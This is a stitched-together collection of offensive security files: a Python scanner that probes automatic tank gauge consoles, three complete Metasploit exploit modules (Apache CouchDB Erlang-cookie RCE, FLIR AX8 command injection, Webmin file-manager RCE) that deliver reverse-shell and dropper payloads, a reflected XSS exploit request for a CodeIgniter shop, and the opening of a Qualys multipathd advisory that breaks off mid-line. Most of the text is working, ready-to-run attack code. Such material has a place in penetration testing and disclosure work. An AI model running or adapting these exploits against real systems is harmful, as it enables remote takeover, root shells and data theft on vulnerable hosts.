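#!/usr/bin/env python3
"""Probe a list of hosts for ATG (automatic tank gauge) consoles on TCP/10001.

Reads one host per line from /tmp/ATG_SCAN.txt, sends the ``I20100``
(in-tank inventory) query and appends every host whose reply carries the
``IN-TANK INVENTORY`` banner to /tmp/ATG_DEVICES.txt.

Only run this against hosts you are authorized to test: the query is a
read-only report, but it is still an unsolicited connection to industrial
equipment.
"""
import socket
import time

INPUT_FILE = "/tmp/ATG_SCAN.txt"
OUTPUT_FILE = "/tmp/ATG_DEVICES.txt"
ATG_PORT = 10001
# SOH-prefixed inventory query; a gauge answers with a report headed "IN-TANK INVENTORY".
ATG_QUERY = b"\x01I20100\n"
ATG_BANNER = "IN-TANK INVENTORY"
CONNECT_TIMEOUT = 5.0   # seconds; without it a filtered port blocks the whole scan
RESPONSE_DELAY = 0.25   # seconds to wait before reading, as in the original script


def is_atg_response(data: bytes) -> bool:
    """Return True if ``data`` contains the in-tank inventory banner.

    Non-ASCII bytes are replaced rather than raising, so a noisy or binary
    reply is simply classified as "not an ATG".
    """
    if not data:
        return False
    return ATG_BANNER in data.decode("ascii", errors="replace")


def probe_atg(host: str, port: int = ATG_PORT, timeout: float = CONNECT_TIMEOUT) -> bool:
    """Connect to host:port, send the inventory query and inspect the reply.

    Returns True only when a reply containing the ATG banner was received.
    Connection errors, timeouts and resets all yield False; the socket is
    always closed, including on the error paths.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(ATG_QUERY)
            time.sleep(RESPONSE_DELAY)
            return is_atg_response(sock.recv(1024))
    except OSError:
        return False


def main() -> None:
    """Scan every non-blank host in INPUT_FILE and record hits in OUTPUT_FILE."""
    with open(INPUT_FILE, "r") as atg_file:
        hosts = [line.strip() for line in atg_file if line.strip()]

    for host in hosts:
        if probe_atg(host):
            with open(OUTPUT_FILE, "a") as out:
                out.write(host + "\t ->\tATG Device\n")


if __name__ == "__main__":
    main()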
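##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'digest'
require 'msf/core/exploit/powershell'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Retry
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck

  # Constants required for communicating over the Erlang distribution protocol, see:
  # https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html
  #
  # EPMD NAMES_REQ: 2-byte length followed by the request code 'n' (0x6e).
  EPM_NAME_CMD = "\x00\x01\x6e".freeze
  # send_name handshake message for our fake node "AAAAAA@AAAAAAA"
  # (version/flags fields as captured by the original exploit).
  NAME_MSG = "\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA".freeze
  # challenge_reply prefix: length, 'r', then the 4-byte challenge we issue to the
  # server; the 16-byte MD5 digest is appended at runtime.
  CHALLENGE_REPLY = "\x00\x15r\x01\x02\x03\x04".freeze
  # Integer value of the challenge carried in CHALLENGE_REPLY. A peer that really holds
  # the cookie must answer with MD5(cookie ++ this value rendered as a decimal string).
  OUR_CHALLENGE = 0x01020304
  # Control term {6, FromPid, '', rex}: REG_SEND of the following term to the node's
  # rex server.
  CTRL_DATA = "\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex".freeze
  # Default Erlang cookie shipped with Apache CouchDB before 3.2.2.
  COOKIE = 'monster'.freeze
  # Encoded rpc request {FromPid, {call, os, cmd, [CMD], user}}, up to and including the
  # STRING_EXT tag 'k' that precedes the 16-bit length of CMD.
  COMMAND_PREFIX = "\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k".freeze
  # STRING_EXT carries a 16-bit length, so a command can never exceed this many bytes.
  MAX_CMD_BYTES = 0xFFFF

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Apache Couchdb Erlang RCE',
        'Description' => %q{
          In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without
          authenticating and gain admin privileges. Such installations use the well-known Erlang distribution cookie
          "monster". This module asks EPMD for the node ports, completes a distribution handshake with that cookie and
          runs the payload through os:cmd on the node. The check method is active: it performs the full handshake
          against the target.
        },
        'Author' => [
          'Milton Valencia (wetw0rk)', # Erlang Cookie RCE discovery
          '1F98D', # Erlang Cookie RCE exploit
          'Konstantin Burov', # Apache CouchDB Erlang Cookie exploit
          '_sadshade', # Apache CouchDB Erlang Cookie exploit
          'jheysel-r7', # Msf Module
        ],
        'References' => [
          [ 'EDB', '49418' ],
          [ 'URL', 'https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit'],
          [ 'CVE', '2022-24706'],
        ],
        'License' => MSF_LICENSE,
        'Platform' => ['win', 'linux'],
        'Payload' => {
          'MaxSize' => 60000 # Due to the 16-bit nature of the cmd in the compile_cmd method
        },
        'Privileged' => false,
        'Arch' => [ ARCH_CMD ],
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_openssl'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => :wget,
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'Windows Command',
            {
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'Type' => :win_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'
              }
            }
          ],
          [
            'Windows Dropper',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :win_dropper,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
              }
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager,
              'CmdStagerFlavor' => :certutil,
              'DefaultOptions' => {
                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-01-21',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      ),
    )

    register_options(
      [
        Opt::RPORT(4369)
      ]
    )
  end

  # Ask EPMD for the node ports and report the first node that accepts the default cookie.
  #
  # Side effect: the authenticated socket is kept in @vulnerable_socket so that exploit()
  # can reuse it instead of handshaking a second time.
  #
  # @return [Exploit::CheckCode]
  def check
    erlang_ports = get_erlang_ports
    return Exploit::CheckCode::Safe('This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?

    erlang_ports.each do |erlang_port|
      # connect_to_erlang_server only hands back a socket once the cookie-based
      # challenge/response has completed, so a socket means "vulnerable".
      vuln_sock = connect_to_erlang_server(erlang_port)
      next unless vuln_sock

      @vulnerable_socket = vuln_sock
      return Exploit::CheckCode::Vulnerable(%(Successfully connected to the Erlang Server with cookie: "#{COOKIE}"))
    end

    Exploit::CheckCode::Safe('This endpoint has an exposed erlang port(s) but appears to be patched')
  end

  # Connect to the Erlang Port Mapper Daemon and collect the ports of the nodes it knows.
  #
  # @return [Array<Integer>] listening port of every node reported by EPMD; empty when
  #   EPMD is unreachable or does not report a "couchdb" node. The EPMD connection is
  #   closed before returning.
  def get_erlang_ports
    ports = []
    print_status("Attempting to connect to the Erlang Port Mapper Daemon (EPMD) socket at: #{rhost}:#{rport}...")
    connect(true, { 'RHOST' => rhost, 'RPORT' => rport })
    # request Erlang nodes
    sock.put(EPM_NAME_CMD)
    sleep datastore['WfsDelay']
    res = sock.get_once

    # NAMES_RESP starts with EPMD's own port (4 bytes, big endian) followed by one
    # "name <node> at port <port>" line per registered node. Deriving the port bytes from
    # RPORT keeps the check correct when EPMD is not on 4369.
    expected_banner = [rport].pack('N') + 'name couchdb'
    unless res && res.include?(expected_banner)
      print_error('Did not find any Erlang nodes')
      return ports
    end

    print_status('Successfully found EPMD socket')
    res.each_line do |line|
      # A line without a trailing number (e.g. the bare port header) is skipped instead of
      # raising on nil.
      port_match = line.match(/\s(\d+)$/)
      ports << port_match[1].to_i if port_match
    end
    ports
  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
    print_error("Error connecting to EPMD: #{e.class} #{e}")
    ports
  ensure
    # The EPMD socket is not needed once the port list is known; leaving it open would
    # leak it when the next connect() replaces self.sock.
    disconnect
  end

  # Complete the Erlang distribution handshake on +erlang_port+ with the default cookie
  # 'monster' (the cookie shipped by Apache CouchDB installations before 3.2.2).
  #
  # @param erlang_port [Integer] node port reported by EPMD
  # @return [Socket, nil] the connected and authenticated socket, or nil when the
  #   handshake fails for any reason (the socket is closed in that case)
  def connect_to_erlang_server(erlang_port)
    print_status(%(Attempting to connect to the Erlang Server with an Erlang Server Cookie value of "#{COOKIE}" (default in vulnerable instances of Apache CouchDB)...))
    connect(true, { 'RHOST' => rhost, 'RPORT' => erlang_port })
    print_status('Connection successful')

    challenge = retry_until_truthy(timeout: 60) do
      sock.put(NAME_MSG)
      sock.get_once(5) # status message ("sok")
      sock.get_once    # recv_challenge
    end
    # 0x001C is the recv_challenge length the original exploit observed from a vulnerable
    # CouchDB node; it depends on the node name length, so a differently named node may
    # need this check loosened.
    unless challenge && challenge.include?("\x00\x1C")
      print_error('Connecting to the Erlang server was unsuccessful')
      disconnect
      return
    end

    # Bytes 9..12 hold the server's 32-bit challenge (after length, 'n', version, flags);
    # the reply digest is MD5(cookie ++ challenge as a decimal string).
    server_challenge = challenge[9..12].unpack1('N')
    reply = CHALLENGE_REPLY.b + Digest::MD5.digest(COOKIE + server_challenge.to_s)
    sock.put(reply)
    sleep datastore['WfsDelay']
    ack = sock.get_once

    # challenge_ack = length 0x0011, 'a', then MD5(cookie ++ our challenge). Checking the
    # digest makes the handshake mutual: the peer must actually hold the cookie, so a
    # decoy that accepts anything (or stray bytes) is not reported as vulnerable.
    expected_ack = "\x00\x11a".b + Digest::MD5.digest(COOKIE + OUR_CHALLENGE.to_s)
    unless ack && ack.start_with?(expected_ack)
      print_error('Authentication was unsuccessful')
      disconnect
      return
    end
    print_status('Erlang challenge and response completed successfully')

    sock
  rescue ::Rex::ConnectionError, ::EOFError, ::Errno::ECONNRESET => e
    print_error("Error when connecting to Erlang Server: #{e.class} #{e} ")
    disconnect
    nil
  end

  # Wrap +cmd+ in a distribution message that makes the node's rex server run os:cmd(cmd).
  #
  # @param cmd [String] shell command to run on the target
  # @return [String] binary frame: 4-byte big-endian length, the 0x70 pass-through tag,
  #   the control term and the rpc request term
  def compile_cmd(cmd)
    # Work in binary throughout: the prefixes contain bytes that are not valid UTF-8 and
    # appending a packed length with a high byte to them would raise CompatibilityError.
    cmd_bytes = cmd.b
    # STRING_EXT stores the length in 16 bits; a longer command would be silently
    # truncated by pack and yield a malformed term.
    fail_with(Failure::BadConfig, "Command is #{cmd_bytes.bytesize} bytes, maximum is #{MAX_CMD_BYTES}") if cmd_bytes.bytesize > MAX_CMD_BYTES

    request = COMMAND_PREFIX.b
    request << [cmd_bytes.bytesize].pack('S>') # bytesize, not length: multibyte chars count once in length
    request << cmd_bytes
    request << "jw\x04user".b                  # NIL_EXT ends the argument list, then the group leader atom
    frame = "\x70".b + CTRL_DATA.b + request
    [frame.bytesize].pack('N') + frame
  end

  # Deliver +cmd+ over an already authenticated Erlang socket.
  #
  # @param cmd [String] command to execute on the target
  # @param opts [Hash] must carry the authenticated socket in opts[:sock]
  def execute_command(cmd, opts = {})
    erl_sock = opts[:sock]
    fail_with(Failure::BadConfig, 'execute_command needs an authenticated Erlang socket in opts[:sock]') unless erl_sock

    print_status('Sending payload... ')
    erl_sock.put(compile_cmd(cmd))
    sleep datastore['WfsDelay']
  end

  # Dispatch the configured target type over +sock+.
  def exploit_socket(sock)
    case target['Type']
    when :unix_cmd, :win_cmd
      execute_command(payload.encoded, { sock: sock })
    when :linux_dropper, :win_dropper
      execute_cmdstager({ sock: sock })
    when :psh_stager
      execute_command(cmd_psh_payload(payload.encoded, payload_instance.arch.first), { sock: sock })
    else
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
  end

  def exploit
    if @vulnerable_socket
      # check() already completed the handshake; reuse that socket.
      exploit_socket(@vulnerable_socket)
      return
    end

    erlang_ports = get_erlang_ports
    # get_erlang_ports always returns an Array, so the meaningful condition is emptiness.
    fail_with(Failure::NoTarget, 'This endpoint does not appear to expose any erlang ports') if erlang_ports.empty?

    erlang_ports.each do |erlang_port|
      erl_sock = connect_to_erlang_server(erlang_port)
      next unless erl_sock

      exploit_socket(erl_sock)
      # One delivery is enough; sending the payload to every node would spawn duplicate sessions.
      return
    end

    fail_with(Failure::NoAccess, %(None of the exposed Erlang nodes accepted the default cookie "#{COOKIE}"))
  end
end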
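##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/stopwatch'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'FLIR AX8 unauthenticated RCE',
        'Description' => %q{
          All FLIR AX8 thermal sensor cameras versions up to and including 1.46.16 are vulnerable to Remote Command Injection.
          This can be exploited to inject and execute arbitrary shell commands as the root user through the id HTTP POST parameter
          in the res.php endpoint.

          This module uses the vulnerability to upload and execute payloads gaining root privileges. The check method is
          active: it injects a sleep command and measures the response time.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Thomas Knudsen (https://www.linkedin.com/in/thomasjknudsen)', # Security researcher
          'Samy Younsi (https://www.linkedin.com/in/samy-younsi)', # Security researcher
          'h00die-gr3y' # metasploit module
        ],
        'References' => [
          ['CVE', '2022-37061'],
          ['PACKETSTORM', '168114'],
          ['URL', 'https://attackerkb.com/topics/UAZaDsQBfx/cve-2022-37061'],
        ],
        'DisclosureDate' => '2022-08-19',
        'Platform' => ['unix', 'linux'],
        'Arch' => [ARCH_CMD, ARCH_ARMLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
          [
            'Linux Dropper',
            {
              'Platform' => 'linux',
              'Arch' => [ARCH_ARMLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => [ 'curl', 'printf' ],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 80,
          'SSL' => false
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
  end

  # Inject +cmd+ through the "id" POST parameter of res.php.
  #
  # The parameter is used unsanitized in a shell, so a numeric alarm id followed by ';'
  # and the command is enough; the numeric prefix is randomized so requests differ.
  #
  # @param cmd [String] shell command to run on the camera
  # @param _opts [Hash] unused; present for the CmdStager callback signature
  # @return [Rex::Proto::Http::Response, nil] the HTTP response, or nil on a transport error
  def execute_command(cmd, _opts = {})
    action_id = rand(1..40)
    send_request_cgi({
      'method' => 'POST',
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      'uri' => normalize_uri(target_uri.path, 'res.php'),
      'vars_post' => {
        'action' => 'alarm',
        'id' => "#{action_id};#{cmd}"
      }
    })
  rescue StandardError => e
    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
    print_error("Communication error occurred: #{e.message}")
    nil
  end

  # Time-based check: inject "sleep N" and require the round trip to take at least N seconds.
  #
  # A target that is merely slow or overloaded can push the elapsed time past the
  # threshold, so read a Vulnerable verdict together with the target's normal latency.
  #
  # @return [Exploit::CheckCode]
  def check
    print_status("Checking if #{peer} can be exploited!")
    sleep_time = rand(5..10)
    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")
    res, elapsed_time = Rex::Stopwatch.elapsed_time do
      execute_command("sleep #{sleep_time}")
    end

    return Exploit::CheckCode::Unknown('No response received from the target!') unless res

    print_status("Elapsed time: #{elapsed_time} seconds.")
    return Exploit::CheckCode::Safe('Failed to test command injection.') unless elapsed_time >= sleep_time

    Exploit::CheckCode::Vulnerable('Successfully tested command injection.')
  end

  def exploit
    case target['Type']
    when :unix_cmd
      print_status("Executing #{target.name} with #{payload.encoded}")
      execute_command(payload.encoded)
    when :linux_dropper
      print_status("Executing #{target.name}")
      execute_cmdstager
    else
      # Previously an unknown type silently did nothing.
      fail_with(Failure::BadConfig, 'Invalid target specified')
    end
  end
end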
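##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::HTTP::Webmin
  prepend Msf::Exploit::Remote::AutoCheck

  # Directory the .cgi is written to, chmod'ed in, and cleaned up from.
  WEBMIN_ROOT = '/usr/share/webmin'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Webmin File Manager RCE',
        'Description' => %q{
          In Webmin version 1.984, any authenticated low privilege user without access rights to
          the File Manager module could interact with file manager functionalities such as downloading files from remote URLs and
          changing file permissions. It is possible to achieve Remote Code Execution via a crafted .cgi file by chaining those
          functionalities in the file manager.

          Valid Webmin credentials are required. The module serves the payload from its own HTTP server, has Webmin
          fetch it into /usr/share/webmin, marks it executable and requests it; the dropped .cgi is registered for cleanup.
        },
        'Author' => [
          'faisalfs10x', # discovery
          'jheysel-r7' # module
        ],
        'References' => [
          [ 'URL', 'https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/'], # exploit
          [ 'URL', 'https://github.com/faisalfs10x/Webmin-CVE-2022-0824-revshell'], # exploit
          [ 'CVE', '2022-0824']
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Privileged' => true,
        'Targets' => [
          [
            'Automatic (Unix In-Memory)',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_memory,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2022-02-26',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # A .cgi file is written to the Webmin root (removed by FileDropper on cleanup).
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options(
      [
        OptPort.new('RPORT', [true, 'The default webmin port', 10000]),
        OptString.new('USERNAME', [ true, 'The username to authenticate as', '' ]),
        OptString.new('PASSWORD', [ true, 'The password for the specified username', '' ])
      ]
    )
  end

  # Version-based check: vulnerable when the reported Webmin version is at most 1.984.
  def check
    webmin_check('0', '1.984')
  end

  # Authenticate with the configured credentials.
  #
  # @return [String, nil] the session cookie from the Webmin mixin
  def login
    webmin_login(datastore['USERNAME'], datastore['PASSWORD'])
  end

  # Referer the file manager UI would send; Webmin's referer check requires it to name
  # the Webmin host. Built from the configured scheme and from rhost/rport so it is
  # right under SSL and when RHOSTS holds more than one target (previously the two
  # call sites hard-coded http:// and one of them lacked the '/' before filemin).
  def filemin_referer
    scheme = datastore['SSL'] ? 'https' : 'http'
    "#{scheme}://#{rhost}:#{rport}/filemin/?xnavigation=1"
  end

  # Make Webmin download the .cgi from this module's HTTP server into WEBMIN_ROOT.
  def download_remote_url
    print_status('Fetching payload from HTTP server')

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/http_download.cgi'),
      'method' => 'POST',
      'keep_cookies' => true,
      'ctype' => 'application/x-www-form-urlencoded; charset=UTF-8',
      # vars_post URL-encodes the values; the old hand-built body sent get_uri raw.
      'vars_post' => {
        'link' => "#{get_uri}.cgi",
        'username' => '',
        'password' => '',
        'path' => WEBMIN_ROOT
      },
      'headers' => {
        'Accept' => 'application/json, text/javascript, */*; q=0.01',
        'Accept-Encoding' => 'gzip, deflate',
        'X-Requested-With' => 'XMLHttpRequest',
        'Referer' => filemin_referer
      },
      'vars_get' => {
        'module' => 'filemin'
      }
    })

    fail_with(Failure::UnexpectedReply, 'Unable to download .cgi payload from http server') unless res
    fail_with(Failure::BadConfig, 'please properly configure the http server, it could not be found by webmin') if res.body.include?('Error: No valid URL supplied!')
    register_file_for_cleanup("#{WEBMIN_ROOT}/#{@file_name}")
  end

  # chmod 0755 the dropped file so miniserv will execute it as a CGI.
  def modify_permissions
    print_status('Modifying the permissions of the uploaded payload to 0755')
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, '/extensions/file-manager/chmod.cgi'),
      'method' => 'POST',
      'keep_cookies' => true,
      'headers' => {
        'Referer' => filemin_referer
      },
      'vars_get' => {
        'module' => 'filemin',
        'page' => '1',
        'paginate' => '30'
      },
      'vars_post' => {
        'name' => @file_name,
        'perms' => '0755',
        'applyto' => '1',
        'path' => WEBMIN_ROOT
      }
    })
    # chmod.cgi answers with a redirect back to the listing on success.
    fail_with(Failure::UnexpectedReply, 'Unable to modify permissions on the uploaded .cgi payload') unless res && res.code == 302
  end

  # Request the .cgi so Webmin executes it with miniserv's privileges ('Privileged' => true).
  def exec_revshell
    res = send_request_cgi(
      'method' => 'GET',
      'keep_cookies' => true,
      'uri' => normalize_uri(target_uri.path, @file_name),
      'headers' => {
        'Connection' => 'keep-alive'
      }
    )

    # A 500 is what the original exploit observed once the CGI has run; anything else
    # (including a client timeout while the payload keeps the CGI busy) is reported as
    # a failure even if a session came back, so check the session list before retrying.
    fail_with(Failure::UnexpectedReply, 'Unable to execute the .cgi payload') unless res && res.code == 500
  end

  # Serve the raw payload to whatever Webmin fetches from our HTTP server.
  def on_request_uri(cli, request)
    print_status("Request '#{request.method} #{request.uri}'")
    print_status('Sending payload ...')
    send_response(cli, payload.encoded, 'Content-Type' => 'application/octet-stream')
  end

  def exploit
    start_service
    # The file name derives from the random resource path, so it is unique per run.
    @file_name = get_resource.delete('/') + '.cgi'
    cookie = login
    # to_s guards against a nil return from the login helper as well as an empty cookie.
    fail_with(Failure::NoAccess, 'Unsuccessful login attempt with creds') if cookie.to_s.empty?
    print_status('Downloading remote url')
    download_remote_url
    print_status('Finished downloading remote url')
    modify_permissions
    exec_revshell
  end
end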
<pre><code>## Title: Ecommerce-CodeIgniter-Bootstrap-1.0 Cross-site scripting (reflected)
## Author: nu11secur1ty
## Date: 10.29.2022
## Vendor: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap
## Software: https://github.com/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap/archive/refs/heads/master.zip
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kirilkirkov/Ecommerce-CodeIgniter-Bootstrap

## Description:
The value of the search_in_title request parameter is copied, without
output encoding, into the value of an HTML tag attribute that is enclosed
in double quotation marks, so a double quote in the input closes the
attribute and any following markup is rendered as HTML.
The payload f5iun"><script>alert(1)</script>h4s83 was submitted in the
search_in_title parameter and the script executed; the request below
uses the same break-out to inject an attacker-controlled link and image.
An attacker who lures a user into opening a crafted link can run
arbitrary JavaScript in that user's browser session (for example read the
ci_session cookie if it is not marked HttpOnly, perform actions as the
user, or redirect them to attacker-controlled content). The impact is
client-side script execution in victims' browsers; it is not server-side
code execution.

[+] Exploit:

```http
GET /Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=f5iun"><a%20href="https://pornhub.com/"%20target="_blank"%20rel="noopener%20nofollow%20ugc">%20<img%20src="https://cdn5-capriofiles.netdna-ssl.com/wp-content/uploads/2017/07/IMG_0068.gif??token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1"%20style="border:1px%20solid%20black;max-width:100%;"%20alt="Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!">%20</a>h4s83&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: 
en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Cookie: ci_session=vndq7brjjjf1an7k6s3q913bsqjf03it<br />Upgrade-Insecure-Requests: 1<br />Referer: http://pwnedhost.com/Ecommerce-CodeIgniter-Bootstrap-master/bg?category=&in_stock=&search_in_title=&order_new=&order_price=&order_procurement=&brand_id=&quantity_more=203512&added_after=205226&added_before=989087&search_in_body=167490&price_from=870466&price_to=586592<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", "Chromium";v="106"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br />Content-Length: 0<br />```<br /><br /># Proof and Exploit:<br />[href](https://streamable.com/y3q67i)<br /><br /></code></pre>
<pre><code><br />Qualys Security Advisory<br /><br />Leeloo Multipath: Authorization bypass and symlink attack in multipathd<br />(CVE-2022-41974 and CVE-2022-41973)<br /><br /><br />========================================================================<br />Contents<br />========================================================================<br /><br />Summary<br />CVE-2022-41974: Authorization bypass<br />CVE-2022-41973: Symlink attack<br />Acknowledgments<br />Timeline<br /><br /><br />========================================================================<br />Summary<br />========================================================================<br /><br />We discovered two local vulnerabilities (an authorization bypass and a<br />symlink attack) in multipathd, a daemon that is running as root in the<br />default installation of (for example) Ubuntu Server:<br /><br />https://ubuntu.com/server/docs/device-mapper-multipathing-introduction<br />https://github.com/opensvc/multipath-tools<br /><br />We combined these two vulnerabilities with a third vulnerability, in<br />another package that is also installed by default on Ubuntu Server, and<br />obtained full root privileges on Ubuntu Server 22.04; other releases are<br />probably also exploitable. 
We will publish this third vulnerability, and
the complete details of this local privilege escalation, in an upcoming
advisory.

The authorization bypass (CVE-2022-41974) has existed since the uid check
itself was introduced, in February 2017 (version 0.7.0), by commit
9acda0c ("Perform socket client uid check on IPC commands"); earlier
versions perform no authorization checks at all, so every release is
affected one way or the other: any unprivileged local user can issue any
privileged command to multipathd.

The symlink attack (CVE-2022-41973) was introduced in May 2018 (version
0.7.7) by commit 65d0a63 ("functions to indicate mapping failure in
/dev/shm"); the vulnerable code was hardened significantly in May 2020
(version 0.8.5) by commit 40ee3ea ("simplify failed wwid code"), but it
remains exploitable nonetheless.


========================================================================
CVE-2022-41974: Authorization bypass
========================================================================

The multipathd daemon listens for client connections on an abstract Unix
socket (conveniently, the multipathd binary itself can act as a client,
if executed with non-option arguments; we use this feature extensively
in this advisory to connect and send commands to the multipathd daemon):

------------------------------------------------------------------------
$ ps -ef | grep 'multipath[d]'
root 377 1 0 13:55 ? 
00:00:00 /sbin/multipathd -d -s<br /><br />$ ss -l -x | grep 'multipathd'<br />u_str LISTEN 0 4096 @/org/kernel/linux/storage/multipathd 18105<br />------------------------------------------------------------------------<br /><br />The commands sent by a client to multipathd are composed of keywords,<br />and internally, each keyword is identified by a different bit; for<br />example, "list" is 1 (1<<0), "add" is 2 (1<<1), and "path" (which<br />requires a parameter) is 65536 (1<<16):<br /><br />------------------------------------------------------------------------<br />155 load_keys (void)<br />...<br />163 r += add_key(keys, "list", LIST, 0);<br />164 r += add_key(keys, "show", LIST, 0);<br />165 r += add_key(keys, "add", ADD, 0);<br />...<br />183 r += add_key(keys, "path", PATH, 1);<br />------------------------------------------------------------------------<br /> 53 #define LIST (1ULL << __LIST)<br /> 54 #define ADD (1ULL << __ADD)<br /> ..<br /> 69 #define PATH (1ULL << __PATH)<br />------------------------------------------------------------------------<br /> 6 enum {<br /> 7 __LIST, /* 0 */<br /> 8 __ADD,<br /> ..<br /> 23 __PATH,<br />------------------------------------------------------------------------<br /><br />In turn, each command is associated with a handler (a C function) by its<br />fingerprint -- the bitwise OR of its constituent keywords; for example,<br />the command "list path PARAM" is associated with cli_list_path() by the<br />fingerprint 65537 (LIST+PATH=1+65536), and the command "add path PARAM"<br />is associated with cli_add_path() by the fingerprint 65538<br />(ADD+PATH=2+65536):<br /><br />------------------------------------------------------------------------<br />1522 void init_handler_callbacks(void)<br />....<br />1527 set_handler_callback(LIST+PATH, cli_list_path);<br />....<br />1549 set_handler_callback(ADD+PATH, cli_add_path);<br />------------------------------------------------------------------------<br />321 static 
